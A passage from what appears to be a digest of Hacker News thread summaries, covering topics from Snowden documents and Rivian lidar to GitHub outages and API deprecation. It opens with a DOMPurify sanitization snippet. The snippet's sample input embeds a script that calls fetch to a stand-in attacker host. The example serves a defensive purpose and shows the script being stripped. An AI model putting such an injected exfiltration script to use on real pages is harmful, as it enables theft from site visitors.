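A minimal sketch of the DOMPurify route mentioned above, in TypeScript for Node via jsdom (DOMPurify and jsdom are the real libraries named in the thread; the specific option choices are an illustrative starting point, not a complete policy):

      import { JSDOM } from "jsdom";
      import createDOMPurify from "dompurify";

      // DOMPurify needs a DOM; jsdom provides one on the server.
      const { window } = new JSDOM("");
      const DOMPurify = createDOMPurify(window as unknown as Window);

      const dirty = `<svg xmlns="http://www.w3.org/2000/svg">
        <circle cx="20" cy="20" r="10"/>
        <script>fetch("https://evil.example/steal")</script>
      </svg>`;

      // Keep SVG shapes and filters; scripts are stripped by default, and
      // FORBID_TAGS makes the intent explicit.
      const clean = DOMPurify.sanitize(dirty, {
        USE_PROFILES: { svg: true, svgFilters: true },
        FORBID_TAGS: ["script", "foreignObject"],
      });

      console.log(clean); // the <script> element is gone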

Accessibility and document-format debates

  • Several comments worry that SVG-heavy content is not easily accessible to visually impaired users or keyboard-only users, especially for interactive charts.
  • There’s discussion of whether “one self-contained SVG per paper” is overkill compared to HTML+JS, notebooks, or PDFs with limited interactivity.
  • SVG is seen as a poor drop‑in replacement for PDF due to multi-page, printing, encryption, and strict layout needs, though others compare it favorably to PostScript-era programmable documents.

Going Through Snowden Documents, Part 1

Extent and Nature of Surveillance

  • Central dispute: does bulk interception of communications mean “everyone is surveilled”?
    • One side: if communications/metadata are captured, stored, and searchable, that is surveillance, regardless of whether a human ever “looks” at it; it creates chilling effects and enables retroactive targeting.
    • Other side: bulk collection is a capability; unless you become a specific “target of interest” and your records are queried/analysed, you’re not meaningfully being surveilled.
  • Debate over terminology: intelligence officials have defined “intercept” as requiring human cataloguing, leaving machine-only processing outside the formal definition.
  • Some argue the entire purpose of mass collection is to algorithmically decide who becomes a target.

Feasibility and Infrastructure

  • Long back-and-forth about whether US intelligence agencies can realistically “collect it all.”
    • Skeptics call NSA infrastructure “toy-sized” compared to global data center capacity, arguing full capture of US-person communications is economically/physically impossible.
    • Others counter with the Utah Data Center specs, data deduplication, compression, and comparisons to the Internet Archive to claim large-scale, long-term storage of world internet traffic (at least metadata/unique traffic) is plausible.
  • William Binney and programs like Stellar Wind are cited as evidence of domestic mass collection; Binney’s later public behavior leads some to question his credibility.

Snowden: Whistleblower or Traitor?

  • Strong split:
    • Supporters see him as exposing illegal, “treasonous” mass surveillance; blame the government for betraying public trust.
    • Critics say he violated lawful trust, harmed national security, and should “face trial”; some depict his motives as personal grievance.
  • Disagreement over his exile in Russia:
    • One view: he “chose” an adversary and became part of its information strategy.
    • Counterview: the US cancelled his passport mid-transit, effectively forcing him to accept Russian asylum.
  • Concerns raised about secret courts, “secret law,” and whether he could ever get a fair public trial.

Impact on Trust, Policy, and Public Apathy

  • Several commenters argue Snowden’s revelations were historically huge, yet led to little reform; surveillance has since expanded and been normalized.
  • Wyden–Daines Amendment (failed by one Senate vote) is cited as proof that even modest warrant protections for web/search history couldn’t pass.
  • Some worry the leaks fed general distrust in institutions and helped pave the way for later populist politics; others say economic factors (e.g., 2008 crisis) mattered more and most Americans barely remember Snowden.
  • Frustration with public apathy: calls to treat privacy-violating organizations like major polluters or tobacco companies—through exposure, shaming, and legislation.

Media, Fiction, and “Conspiracy” Framing

  • Films and TV (“Enemy of the State,” X-Files, Clancy novels, Stargate, etc.) seen by some as eerily prescient or even deliberate “pressure release valves” that normalize or discredit real capabilities by embedding them in fiction.
  • Others argue conflating 1990s-style grand conspiracies (assassinations of US citizens, omniscient panopticons) with the Snowden docs is misguided; those leaks showed serious abuses, but not the cinematic extremes.

Meta: Missing Docs, HN Culture, and Bots

  • Question why most Snowden documents remain unreleased and why journalists largely stopped publishing them.
  • Some see this thread’s anti-Snowden sentiment as indicative of HN’s alignment with government/contractor interests, or as driven by bots and coordinated propaganda.
  • Others note that both “Snowden as pure hero” and “Snowden as pure villain/Russian asset” narratives are oversimplifications; the situation is inherently dual: both clear whistleblowing and clear lawbreaking.

Rivian Unveils Custom Silicon, R2 Lidar Roadmap, and Universal Hands Free

Custom Silicon & Autonomy Strategy

  • Many see Rivian’s custom chip as a bold but risky “build vs buy” move given the cost, lead time, and Rivian’s ongoing cash burn.
  • Supporters argue:
    • Automotive-grade, power‑efficient compute with long lifetimes is a niche COTS doesn’t fully satisfy.
    • Owning the stack (chips + software) could become a lucrative B2B platform, especially after the VW deal.
  • Skeptics counter:
    • Nvidia, Qualcomm, etc. already sell strong automotive silicon (Orin, Thor).
    • Volume, iteration speed, and tailoring from those vendors may beat a bespoke ASIC economically.
    • This looks to some like an “AI hype” side quest instead of focusing on getting $40k R2s out profitably.

Rivian Software Quality

  • Owners report sharply mixed experiences: some say their trucks are rock-solid; others describe severe bugs (doors not opening, UI misfires, unusable mobile app).
  • The fact that a major legacy OEM paid billions for this stack is viewed as either a huge validation or an indictment of how bad incumbent software must be.

Lidar: Capability & Safety Debates

  • Thread dives deep into lidar types:
    • 905 nm vs 1550 nm wavelengths, camera damage vs eye safety, and differences in how eyes vs lenses interact with IR.
  • Consensus: automotive lidars are designed as Class 1 (eye‑safe in normal use), but edge cases (e.g., very close exposure, many concurrent lidars, device failures) are not fully understood and certification transparency is limited.
  • Some worry about cumulative exposure (humans, animals, insects); others think it’s minor compared to sunlight and existing risks.

Market Reaction & Business Model

  • Commenters note Rivian’s stock dropped on the announcement; proposed reasons:
    • Market distrust that Rivian can execute custom silicon and Gen3 autonomy while still ramping R2.
    • Fear that current and near‑term vehicles are now implicitly “obsolete.”
  • Many expect autonomy to be sold as a subscription, likely bundled with insurance, citing:
    • Ongoing software/ops costs and liability.
    • Waymo data suggesting lower injury rates, creating room to capture insurance savings.
  • Others push back, preferring “you get what you buy” with no ongoing fees and warning about “subscription to life” dynamics.

CarPlay / Android Auto & Affordability

  • A large contingent says the main things they want from Rivian are:
    • CarPlay/Android Auto.
    • Lower prices.
  • Several would have bought a Rivian but instead chose other EVs largely due to CarPlay and better lease economics.
  • Rivian’s stated rationale for rejecting CarPlay (a fully integrated, consistent in‑house UX) is widely seen as control/lock‑in; some accept it if the native UX is good, others say it’s a deal breaker.

Autonomy Tech Landscape: Tesla, Waymo, Rivian

  • Strong disagreement over whether lidar‑heavy approaches (Waymo, Rivian roadmap) or camera‑only (Tesla) is the right bet.
  • Pro‑Waymo/lidar side:
    • Waymo already runs fully driverless paid rides in multiple cities; Tesla FSD still requires supervision.
    • Lidar simplifies depth, object detection, and robustness (night, fog, long tail scenarios).
  • Pro‑Tesla/camera side:
    • Remaining failures are mostly planning, not perception; if cameras solve depth well enough, lidar just adds cost/complexity.
    • Tesla’s vertically integrated, software‑defined architecture and scale give it better economics.
  • Some suggest Rivian’s best‑case niche is as a licensable autonomy platform for other OEMs if camera‑only stumbles and Waymo is viewed as too dominant or too “Google.”

Ownership vs Robotaxis vs Transit

  • One large subthread argues that many “reasons for autonomy” (skip driving, sleep, work en route, safer roads) are better solved by robust public transit, rail, biking, and fewer cars overall.
  • Others strongly prefer private vehicles as:
    • Mobile storage, private space, pet‑ and kid‑friendly, road‑trip and off‑road capable.
    • More convenient than Waymo/Uber, especially outside dense cores.
  • There’s concern that widespread autonomy could increase vehicle miles traveled (VMT), sprawl, energy use, and tire pollution, even as crash rates fall.

Insurance, Liability & Safety Engineering

  • Many expect autonomy and insurance to converge: OEM‑provided coverage tied to use of the self‑driving stack.
  • Questions raised:
    • How to handle catastrophic software failures affecting many vehicles at once?
    • Who is liable when autonomy fails (OEM vs driver), especially at L3+?
  • Some criticize over‑the‑air updates for safety‑critical systems (Tesla cited) and note that traditional automotive functional safety standards (ASIL, etc.) and regulatory evidence are still sparse in public.

Competition & Geopolitics

  • Multiple comments argue Rivian (and other US EV makers) survive partly due to US protectionism; Chinese OEMs are said to offer better‑specced, cheaper EVs with strong ADAS already.
  • Debate on whether Rivian’s R2/R3 can compete on price and features in Europe once BYD/Xiaomi and others expand further.

Programmers and software developers lost the plot on naming their tools

Embarrassing or opaque names

  • Many comments share examples of tools or packages whose names lead to porn, fetishes, or childish humor when searched, or that are awkward to say in professional settings.
  • This is used both to support the article’s claim (“this is embarrassing and off‑putting”) and to shrug it off as long-running hacker culture.

Descriptive vs whimsical naming

  • Some strongly agree with the article: names should convey function or domain (“http-request-validator” beats “zephyr”), especially for infrastructure, libraries, and internal tools.
  • Others argue descriptive names are overrated: you rarely infer true behavior from a name anyway; meaningful understanding always requires reading docs or code.
  • Several point out that historically praised names (awk, sed, grep, BASIC, Postgres, etc.) are not obvious to newcomers either, and mainly feel “good” because people already know them.

Renaming, scope creep, and identifiers

  • One camp: don’t use purpose‑agnostic names to pre‑optimize for scope creep; instead, name by function and accept the rare cost of a rename when direction changes.
  • Opposing camp: renaming anything widely shipped is extremely painful (packages, configs, docs, scripts, mental models), so pick a stable “ID-like” name from the start and let functionality evolve.
  • Popular compromise: internal code names (often whimsical) during development, then a more descriptive or marketable name once something is user-facing.

Comparisons to other fields

  • Multiple commenters challenge the article’s claim that other technical disciplines are more disciplined: they list playful or opaque names in biology, chemistry, physics, astronomy, medicine, the military, and engineering.
  • Others counter that those fields also have parallel systematic naming schemes (IUPAC, drug generics, engine model codes, astronomical catalog numbers) that software often lacks.

Searchability, acronyms, and collisions

  • Whimsical, unique names can be excellent for search; generic names like “auth-service” or “http-client” are hard to Google and ambiguous in conversation.
  • Conversely, overloaded common words (e.g., “combine”, “windows”, “nat”, “webhooks”) or generic library names can create confusion and name collisions across ecosystems.
  • Heavy use of acronyms and initialisms in “serious” naming is cited as another source of cognitive load; people often end up memorizing arbitrary letter salads instead of clear concepts.

Culture, professionalism, and fun

  • Some see silly names as unprofessional or as adding “cognitive tax”.
  • Others defend whimsy as part of engineering culture, argue that many serious sciences do the same, and say that joy, memorability, and branding are legitimate goals alongside clarity.

GPT-5.2

Model identity, training, and scaling

  • Many commenters doubt GPT‑5.2 is a genuinely new base model, suspecting continued pretraining on GPT‑4/4o weights plus more aggressive reasoning/RL rather than a full fresh run.
  • The new August 2025 knowledge cutoff is seen as evidence of either incremental pretraining or a late, rushed run triggered by Google’s Gemini 3 “code red.”
  • Discussion of a broader slowdown in pure scaling since GPT‑4: most frontier models are now improving mainly through reasoning, RL, and training data quality rather than huge parameter jumps. Hardware limits (GPU memory, MoE routing, interconnect) and datacenter constraints are a recurring theme.

Benchmarks, ARC‑AGI, and accusations of gaming

  • The big ARC‑AGI v2 jump (into low‑50% range) is widely noted; some call it “insane” and encouraging for generalization, others see it as a sign benchmarks are being explicitly trained on.
  • Debate over ARC‑AGI itself: some treat it like a robust IQ‑style test for reasoning; others argue it’s overfittable, vision‑heavy, or analogous to being good at contest math rather than “intelligence.”
  • OpenAI’s homegrown GDPval benchmark draws skepticism as an in‑house metric. There’s concern about cherry‑picked cross‑lab comparisons (e.g., omitting SWE‑Bench cases where rivals win).
  • Growing sentiment that benchmark saturation makes headline numbers less meaningful than long‑horizon, real‑world task performance.

Pricing, Pro tier, and economics

  • API prices for 5.2 are ~40% higher than 5.1; many question calling this “slight.” Some note it’s still cheaper than top Anthropic/Google tiers, others see this as the start of enshittification.
  • GPT‑5.2 Pro reasoning is viewed as “priced not to be used” except by highly price‑insensitive customers or for marketing benchmarks; reports of single prompts costing double‑digit dollars.
  • A few point out that reasoning on difficult benchmarks (e.g., ARC‑AGI) is dramatically cheaper than earlier o3‑style models, so “intelligence per dollar” has still improved.

Capabilities and UX: coding, vision, and spreadsheets

  • Coding: mixed experiences. Some find Codex + 5.x Thinking excellent for complex debugging and refactors; others still prefer Claude Code or Gemini 3 for reliability and speed, especially for UI work.
  • Vision remains notably subhuman. OpenAI’s own motherboard demo is criticized for mislabeling components; OpenAI staff acknowledge the example shows “better, not perfect” vision.
  • Spreadsheet and finance tasks (e.g., multi‑statement models, SEC parsing) are a standout positive anecdote; some see this as serious pressure on junior analyst roles.
  • Context handling: 400k API context and new “compaction” are praised, but ChatGPT web/app limits remain lower, and very long contexts still degrade quality.

Safety, hallucinations, and trust

  • Third‑party red‑teaming shows high refusal rates for naive harmful prompts but much weaker resistance under jailbreaks, especially around impersonation, harassment, and disinformation.
  • Many users remain frustrated by confident hallucinations in domains like electronics, physics, and niche technical details, arguing that better grounding and calibrated uncertainty matter more now than raw benchmark gains.

Competition and user migration

  • A sizable minority say they’ve switched primary usage to Gemini 3 or Claude (especially for coding and search‑heavy tasks), citing better day‑to‑day feel despite OpenAI’s benchmark claims.
  • Others still prefer ChatGPT for voice, overall polish, or reliability of deep reasoning, but agree that meaningful differentiation now lies more in UX, tools, and grounding than in another small reasoning bump.

Days since last GitHub incident

Overall reaction to GitHub instability

  • Several users noticed the outage before the official status page, citing failed releases, Actions failures, and “unicorn” error pages.
  • Some now reflexively assume CI failures are GitHub’s fault rather than their own, and argue stability should be prioritized over AI features.
  • Others feel outages are frequent enough that internal discussions have begun about moving away from Actions, Packages, or GitHub entirely, describing the platform as “decaying.”

The “days since last incident” site and humor

  • Many found the site funny and perfectly minimal, with some amused that it works even offline due to being static.
  • Others criticized it as low-effort and wished for a more elaborate meme (physical-style accident sign, octocat gags, “days without accident” templates, AI jokes).
  • A few users complained about design/usability (text too small, looks blank on phones).

Reliability, “incidents,” and SLAs

  • Some argue the counter is misleading because minor or obscure component outages reset it; others respond that what’s “trivial” varies by user.
  • Discussion touches on uptime expectations: not everyone needs “five nines,” but even short outages can be painful when they block CI, container registry pulls, or payments.
  • Users point out registries and artifact services can be single points of failure, even if read-only mirrors are conceptually simple.

Alternatives, mirroring, and decentralization

  • Suggestions include GitLab, self-hosted GitHub Enterprise Server, mirrors for dependencies (e.g., via Nixpkgs), and decentralized/p2p forges like radicle.
  • Some say moving off GitHub has high friction due to network effects and mindshare; others share negative GitLab experiences or say uptime is similar.
  • Mirroring source is seen as practical; replicating Actions, issues, registries, or Copilot is harder.

AI features and local vs cloud setups

  • One user describes heavy reliance on GitHub’s agents/Copilot for reviving old projects and is frustrated that this increases exposure to downtime.
  • Self-hosted GitHub Enterprise is mentioned but noted to lack Copilot APIs.
  • Multiple commenters explain that local LLMs still lag hosted “frontier” models; local hosting is framed as useful mainly for privacy/hobby use, not as a seamless Copilot replacement.
  • Discussion branches into hardware (Apple Silicon vs NVIDIA boxes) and building one’s own agent/tooling stack, with some arguing that investing in custom tools has high long-term ROI.

Quality issues: Actions and UX

  • Users list odd GitHub Actions behaviors (stuck jobs, inconsistent status, phantom PR badges) as evidence of brittle internals.
  • There is broader criticism of Microsoft-era quality and a sense that “AI everywhere” has crowded out core product polish.
  • Separate complaints focus on unremovable crypto spam notifications; workarounds via the GitHub CLI and a recent backend fix are shared.

IPv6 and networking

  • Some argue GitHub’s lack of IPv6 in 2025 should count as a permanent “incident”; others say residential IPv6 penetration is still too low for it to be business-critical.
  • Brief side discussion covers ISPs, router firewalls, and cloud providers that price IPv4 separately from IPv6.

Things I want to say to my boss

Work, burnout, and disengagement

  • Many see modern white‑collar work as inhumane, with burnout framed as an organizational math problem (too much work, too few people) rather than an individual weakness.
  • Others push back, arguing work is inherently about survival and cooperation, and office work isn’t intrinsically “hard” compared to historical labor struggles.
  • Several describe responding by “withdrawing” or “quiet quitting”: doing competent work but no longer giving discretionary effort or emotional investment.
  • Some note cultural contrasts: in parts of Europe burnout is treated as a system failure or health issue, while in the US it’s often moralized as commitment or lack thereof.

Profit, managers, and incentives

  • A large subthread blames “profit at any cost,” short‑termism, and the principal–agent problem: executives and boards optimize quarterly metrics and exits, not long‑term value or people.
  • The rise of the professional managerial/MBA culture is cited as having devalued domain expertise and people, treating workers as interchangeable “resources.”
  • Others argue the root problem is average or weak managers under pressure, not profit‑seeking per se; good profit optimization should align with stable, healthy teams.

Performative care vs real leadership

  • The most resonant theme is “performative care”: therapy‑style check‑ins, engagement surveys, and “shielding” rhetoric without actual support, staffing, or honest communication.
  • Commenters emphasize that people quickly detect this gap between words and actions, and it erodes trust and loyalty.
  • Some share experiences with abusive or volatile bosses and long‑lasting mental‑health damage; others recount “soft‑skills obsessed” managers whose teams accomplished little and ran out of money.

Engineers’ shifting attitudes and generational tension

  • Older engineers recall entering the field for love of the craft and resent newer “careerist” or “resume‑driven” behavior (e.g., over‑engineering to pad resumes).
  • Others counter that with precarious jobs, high costs of living, and frequent layoffs, focusing on pay and mobility is rational self‑defense; trying to care deeply often leads to burnout or being labeled a problem.

Management, hierarchy, and structural responses

  • Some argue most engineering management and executive layers are wasteful; teams need clear goals and autonomy more than “leadership theater.”
  • Others stress that good management and genuine care are hard to scale; character (doing the right thing despite personal risk) is rare.
  • Unionization is repeatedly proposed as the only proven, scalable check on abusive or indifferent leadership, though many in the industry still resist it.

Meta: authorship and style

  • Several speculate the essay is AI‑written due to repetitive “not X but Y” constructions; others dismiss this as unhelpful and often ill‑informed, noting the style predates AI and matches common human rhetoric.

Deprecate like you mean it

Reaction to the article’s proposal (random wrong results)

  • Overwhelming consensus that intentionally returning wrong or intermittent results from deprecated APIs is “profoundly awful,” unethical, and indistinguishable from sabotage.
  • Main objection: it creates flappy, non-deterministic bugs that are the hardest to debug and destroys confidence in CI and systems.
  • Several commenters say if you want to break an API, do it explicitly and predictably, not via hidden behavior changes.
  • Many initially missed that the article was sarcastic; the author later added a clarifying note that “it’s better to leave the warts,” and that warnings are weak but intentional breakage is worse.

What people consider good deprecation practice

  • Use clear timelines and channels: deprecate with warnings, publish dates/versions for removal, then remove.
  • Prefer breaking changes only in major versions (true SemVer) and avoid breaking in minor releases, especially in core libs like urllib, NumPy, etc.
  • Suggested flows:
    • Deprecation warnings → compiler/linter warnings → compiler/linter errors with a trivial escape hatch → full removal.
    • Hard errors with explicit, ugly config/env flags to temporarily re-enable deprecated behavior (a minimal sketch follows this list).
  • Strong dislike for “permanent deprecation” without ever removing, but also for projects that threaten deprecation then never follow through.
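  • A minimal Python sketch of that second flow; the function names, flag name, and version are all invented for illustration:

        import os
        import warnings

        def new_api(x):
            return x * 2

        def old_api(x):
            # Escape hatch: explicitly opt back in to the deprecated behaviour, loudly.
            if os.environ.get("MYLIB_I_KNOW_OLD_API_IS_GOING_AWAY") == "1":
                warnings.warn("old_api() is deprecated; use new_api()",
                              DeprecationWarning, stacklevel=2)
                return new_api(x)
            # Default after the announced cut-off: a hard, predictable error.
            raise RuntimeError(
                "old_api() was removed in 3.0; call new_api(), or set "
                "MYLIB_I_KNOW_OLD_API_IS_GOING_AWAY=1 for one more release."
            )

    Either way the caller gets deterministic behaviour: the old result or a clear error, never a silently wrong one.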

Backwards compatibility vs progress

  • One camp: bitrot is mostly a series of conscious backward-incompatible changes; old software “should” still run; API churn is negative value and should be extremely rare.
  • Other camp: some breakage is necessary for security, maintainability, or performance; Windows, Python 2→3, .NET, Java, etc., show that trade-offs are inevitable.
  • Disagreement over whether all progress can preserve backward compatibility; some claim yes in principle, others call that naïve.

Static typing, tooling, and incentives

  • Argument that static typing and easy refactoring can encourage maintainers to introduce breaking changes (“it was trivial for me, so it’s trivial for users”).
  • Counter-argument: static typing helps enforce contracts and detect breakages earlier; the real issues are culture and project philosophy, not typing.
  • Several note that tools and warnings exist, but many teams ignore warnings and don’t pin dependencies, effectively choosing to absorb breakages.
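  • For teams that do want to catch breakage early, the usual levers are pinning versions and promoting warnings to errors in CI; a minimal sketch of the latter, assuming a pytest-based suite:

        # Run the test suite with DeprecationWarning promoted to an error,
        # so upcoming removals fail CI instead of scrolling past in the logs.
        import subprocess
        import sys

        subprocess.run(
            [sys.executable, "-m", "pytest", "-W", "error::DeprecationWarning"],
            check=True,
        )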

Alternative pressure mechanisms

  • Proposed—but controversial—ideas:
    • Gradually adding latency (sleep) to deprecated paths, sometimes exponentially, to create a business incentive to migrate (sketched after this list).
    • Brownouts (temporary, clearly messaged outages) or HTTP 426-style hard failures with upgrade instructions.
    • Charging for legacy API support or offering paid contracts/LTS instead of silent rug-pulls.
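  • A rough sketch of the latency idea as a Python decorator; the names, date, and growth schedule are all invented, and the point is only that the behaviour stays correct while the delay grows:

        import datetime
        import functools
        import time
        import warnings

        def deprecated_with_latency(removal_date, base_delay=0.1):
            """Hypothetical pressure mechanism: the longer past removal_date, the slower the call."""
            def decorator(func):
                @functools.wraps(func)
                def wrapper(*args, **kwargs):
                    overdue_days = (datetime.date.today() - removal_date).days
                    if overdue_days > 0:
                        time.sleep(base_delay * 2 ** (overdue_days // 30))  # doubles every 30 days
                    warnings.warn(f"{func.__name__} is deprecated",
                                  DeprecationWarning, stacklevel=2)
                    return func(*args, **kwargs)
                return wrapper
            return decorator

        @deprecated_with_latency(removal_date=datetime.date(2025, 1, 1))
        def legacy_endpoint():
            return {"status": "ok"}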

Ethics and user expectations

  • Strong view that published APIs are implicit long-term promises; users reasonably expect them to keep working.
  • Others stress that contracts and costs matter: nothing can be supported forever, but termination should be explicit, predictable, and clearly communicated.

iPhone Typos? It's Not Just You – The iOS Keyboard Is Broken [video]

Perceived Keyboard Regression

  • Many report a sharp increase in typos in recent iOS versions, especially after the “glass”/iOS 26 update, on both small (SE, mini) and large phones.
  • Users describe keys visually highlighting correctly while nearby letters are inserted, making them question their own motor skills or aging.
  • Some note this didn’t happen on early iPhones or even a 2007 iPod touch, which they recall as nearly error‑free.

Autocorrect, Prediction & “Look‑Behind” Editing

  • Aggressive “look‑behind” correction is a major source of anger: the OS silently changes words several tokens back after you type a new one.
  • Autocorrect often turns correct words into nonsensical or rare ones, and can fight repeated attempts to enter the desired word.
  • A long‑standing bug where words get duplicated (“duplicateduplicate”) still appears for some.
  • Safety/content filters: people struggle to type phrases like “kill myself,” profanity, or certain racial terms, while the system happily suggests more offensive alternatives in other languages.

Slide‑to‑Type, Hitboxes & Possible Technical Causes

  • One camp blames slide‑to‑type: with it enabled, hitboxes are dynamically resized and presses are registered on finger‑up, so small slides can cause wrong letters despite the popup showing the “right” key.
  • Others with slide‑to‑type disabled still see issues and point out the video shows “U” highlighted while a different character is committed, suggesting a deeper bug.
  • Some mention invisible hitbox reshaping and prediction based on common word sequences, which may now be tuned too aggressively.
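  • To make the dynamic-hitbox idea concrete, here is a toy model of probability-weighted key targeting; it is a generic illustration, not Apple's implementation, and every coordinate and probability below is invented:

        import math

        KEY_CENTERS = {"y": (5.5, 1.0), "u": (6.5, 1.0), "i": (7.5, 1.0)}   # made-up layout
        NEXT_LETTER_PRIOR = {"y": 0.15, "u": 0.05, "i": 0.80}               # made-up prediction

        def resolve_tap(x, y):
            def score(key):
                cx, cy = KEY_CENTERS[key]
                distance_sq = (x - cx) ** 2 + (y - cy) ** 2
                # Touch likelihood (falls off with distance) times the language-model prior.
                return math.exp(-distance_sq / 0.5) * NEXT_LETTER_PRIOR[key]
            return max(KEY_CENTERS, key=score)

        # A tap landing essentially on "u" still resolves to "i" when the prior is skewed enough.
        print(resolve_tap(6.6, 1.0))  # -> "i"

    If the prediction term is weighted too heavily relative to where the finger actually lands, exactly the behaviour described in the thread falls out: the popup can highlight the touched key while a different letter is committed.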

Editing & Cursor Control

  • Editing text is widely described as “a nightmare”: getting the cursor into the middle of a word, dismissing selection popups, or undoing a wrong correction is slow and error‑prone.
  • The space‑bar cursor‑move gesture helps some, but fails in numeric/URL fields and can itself misplace the cursor.

Comparisons, Alternatives & Multilingual Pain

  • Many who moved from Android praise older Android keyboards (Swype, early SwiftKey, Gboard on Pixels) as far superior, especially for swipe and next‑word prediction.
  • Others say Android keyboards have also degraded in recent years, with similar overzealous ML and look‑behind behavior.
  • Multilingual users on both platforms report severe regressions: the keyboard latches onto the “wrong” language after a single foreign word, splits compounds, and never seems to learn domain‑specific or community slang.

Workarounds, Third‑Party Keyboards & Trust

  • Common coping strategies: disabling autocorrect/prediction, turning off slide‑to‑type, using dictation, external Bluetooth keyboards, or niche third‑party keyboards (T9‑style, swipe‑only, open source).
  • On iOS, third‑party keyboards are hampered by platform limits, stability issues, and privacy concerns (fear of keylogging or cloud training), though some run without “full access.”

Broader iOS / Software‑Quality Concerns

  • The keyboard is framed as one example of a wider iOS decline: UI jank, Safari rendering bugs, notification confusion, call and GPS issues, awkward new layouts (Phone, Safari, Alarms), and “glass” visuals that hurt usability.
  • Several threads question modern software incentives: focus on new features, design fashion, and AI overlays rather than fixing regressions; lack of meaningful user choice due to forced updates, app stores, and ecosystem lock‑in.
  • Some lament the shift from human‑factors/HCI to “UX” driven by business metrics, A/B tests, and dark patterns, with quality and user control steadily eroded.